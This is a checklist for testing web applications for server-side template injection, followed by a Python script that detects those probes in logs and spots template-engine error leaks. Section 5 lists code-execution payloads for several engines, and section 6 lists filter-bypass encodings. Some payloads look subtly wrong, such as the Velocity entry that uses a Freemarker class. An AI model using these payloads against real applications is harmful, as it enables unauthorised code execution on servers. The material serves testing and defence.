  1. Initial Information Gathering

    • Identify and map all endpoints that accept user input for template rendering.
    • Review source code (if available) to understand template rendering mechanisms.
    • Check for user inputs in templates, URLs, headers, and request bodies.
  2. Basic SSTI Testing

    • Test common SSTI payloads to identify template engine and injection points:
      • {{7*7}}
      • ${7*7}
      • <%= 7 * 7 %>
      • #{7*7}
    • Try injecting payloads in different user inputs (e.g., form fields, query parameters).
  3. Detecting Template Engines

    • Identify the template engine by using specific payloads for known engines:
      1. Jinja2 (Python):
        • {{7*'7'}}
        • {{config.items()}}
      2. Twig (PHP):
        • {{7*7}}
        • {{_self.env.globals}}
      3. Freemarker (Java):
        • ${7*7}
        • ${"freemarker.template.utility.Execute"?new()}
        • <#assign ex = "freemarker.template.utility.Execute"?new()>
      4. Velocity (Java):
        • #set($x = 7 * 7)
        • $class.inspect("java.lang.Runtime").newInstance().exec("ls")
      5. Smarty (PHP):
        • {$smarty.version}
        • {if 7*7}
      6. Thymeleaf (Java):
        • ${7*7}
        • th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}"
  4. Payloads

    • Test payloads that can bypass filters and restrictions:
      • {{7*'7'}}
      • ${7*'7'}
      • <%= 7 * '7' %>
    • Use concatenation to bypass filters: {{7*('7')}}, ${7*('7')}
    • Inject payloads in nested contexts to test for complex injections.
  5. Exploiting SSTI

    • Test for code execution:
      • Python (Jinja2): {{config.from_object('os').popen('ls').read()}}
      • PHP (Twig): {{_self.env.globals.system('ls')}}
      • Java (Freemarker): <#assign ex = "freemarker.template.utility.Execute"?new()> ${ex("ls")}
      • Java (Velocity): #set($x = "freemarker.template.utility.Execute") $x.new().exec("ls")
      • PHP (Smarty): {system('ls')}
      • Java (Thymeleaf): th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}"
  6. Bypassing Input Validation

    • Test for input validation bypass using encoding and escaping:
      • URL encoding: %7B%7B7*7%7D%7D
      • HTML encoding: &#123;&#123;7*7&#125;&#125;
    • Use different template syntax to bypass filters:
      • {{7*7}}
      • ${7*7}
      • <%= 7 * 7 %>
  7. Error Handling and Response Analysis

    • Analyze server responses for clues about SSTI vulnerabilities.
    • Look for error messages that disclose template engine details or execution errors.
    • Verify if application stack traces are exposed in responses.
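Added example, not part of the original checklist: a standard-library Python script that turns the probes listed in sections 2, 3 and 6 into log-side detection, undoing the URL and HTML encodings section 6 mentions before matching, and that checks a response body for the engine error disclosure and stack-trace leakage described in section 7. The access-log lines, IP address, paths and error page are constructed samples, and the delimiter and indicator labels are names chosen for this example.

```python
"""Defensive detection for the SSTI probes in this checklist (added example).

Standard library only. Two checks:
  1. scan access-log lines for the probe payloads from sections 2, 3 and 6,
     after undoing the URL/HTML encodings section 6 lists;
  2. scan a response body for template-engine error disclosure (section 7).
All log lines, IPs, paths and the response body below are constructed samples.
"""
import re
from html import unescape
from urllib.parse import unquote

# Delimiters used by the engines in section 3; group 1 captures the expression.
DELIMITERS = {
    "mustache {{ }} (Jinja2/Twig)": re.compile(r"\{\{(.*?)\}\}", re.S),
    "dollar ${ } (Freemarker/Thymeleaf)": re.compile(r"\$\{(.*?)\}", re.S),
    "erb <%= %>": re.compile(r"<%=(.*?)%>", re.S),
    "hash #{ }": re.compile(r"#\{(.*?)\}", re.S),
    "freemarker directive <#assign>": re.compile(r"<#assign\s+(.*?)>", re.S),
    "velocity directive #set": re.compile(r"#set\s*\((.*?)\)", re.S),
    "smarty { }": re.compile(r"\{(\$smarty\.[^}]*|if\b[^}]*|system\([^}]*)\}"),
}

# What inside the delimiters makes it a probe rather than ordinary braces.
# Order matters: the first matching indicator is reported.
INDICATORS = {
    "arithmetic probe": re.compile(r"\d+\s*\*\s*\(?'?\d+'?\)?"),
    "engine introspection": re.compile(
        r"\bconfig\b|\b_self\b|smarty\.version|env\.globals|class\.inspect"),
    "java class access": re.compile(r"java\.lang\.|freemarker\.template\.utility|\bT\("),
    "command execution": re.compile(r"\b(popen|system|exec|Execute)\s*\("),
}

# Error strings that reveal the engine (section 7), plus generic stack-trace shapes.
ENGINE_ERROR_MARKERS = {
    "jinja2": re.compile(r"jinja2\.exceptions\.\w+"),
    "twig": re.compile(r"Twig\\Error\\\w+|Twig_Error_\w+"),
    "freemarker": re.compile(r"freemarker\.(?:core|template)\.\w+"),
    "velocity": re.compile(r"org\.apache\.velocity\.\w+"),
    "smarty": re.compile(r"Smarty(?:Compiler)?Exception"),
    "thymeleaf": re.compile(r"org\.thymeleaf\.\w+"),
    "stack trace": re.compile(r"Traceback \(most recent call last\)|^\s+at [\w.$]+\(", re.M),
}

# Combined-log-format line; only the fields this example uses are named.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode(value: str) -> str:
    """Undo URL and HTML entity encoding (twice, to catch double encoding) so the
    signatures see what the template engine would see. Over-decoding legitimate
    text is accepted here because this is a detector, not a parser."""
    for _ in range(2):
        value = unescape(unquote(value))
    return value


def classify(value: str):
    """Return (delimiter, indicator, matched_text) findings for one input value."""
    decoded = decode(value)
    findings = []
    for dname, dpat in DELIMITERS.items():
        for m in dpat.finditer(decoded):
            for iname, ipat in INDICATORS.items():
                if ipat.search(m.group(1)):
                    findings.append((dname, iname, m.group(0)))
                    break
    return findings


def scan_log(text: str):
    """Run classify() over the request target of each parsable log line."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for dname, iname, payload in classify(m["target"]):
            alerts.append({"ip": m["ip"], "status": int(m["status"]),
                           "delimiter": dname, "indicator": iname, "payload": payload})
    return alerts


def detect_engine_disclosure(body: str):
    """Names of engine/stack-trace markers present in a response body."""
    return [name for name, pat in ENGINE_ERROR_MARKERS.items() if pat.search(body)]


# Constructed sample log: encoded {{7*7}}, a benign value, ${7*'7'},
# an HTML-entity-encoded {{config.items()}} wrapped in URL encoding, and {$smarty.version}.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /profile?name=alice HTTP/1.1" 200 480
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /search?q=%24%7B7*%277%27%7D HTTP/1.1" 500 2048
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /profile?name=%26%23123%3B%26%23123%3Bconfig.items()%26%23125%3B%26%23125%3B HTTP/1.1" 200 3000
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?title=%7B%24smarty.version%7D HTTP/1.1" 200 400
"""

# Constructed error page (file name and line number are placeholders).
SAMPLE_RESPONSE = """<html><body><h1>Internal Server Error</h1><pre>
Traceback (most recent call last):
  File "app.py", line 12, in profile
    return render_template_string(page)
jinja2.exceptions.TemplateSyntaxError: unexpected '}'
</pre></body></html>"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print("response discloses:", detect_engine_disclosure(SAMPLE_RESPONSE))
```

The delimiter-plus-indicator split keeps ordinary curly braces (JSON fragments, JavaScript template literals in user content) from alerting on their own; a hit needs both the engine syntax and an arithmetic probe, introspection name, class reference or call. Feeding the same matcher the decoded request body would extend it to section 2's form-field and header inputs.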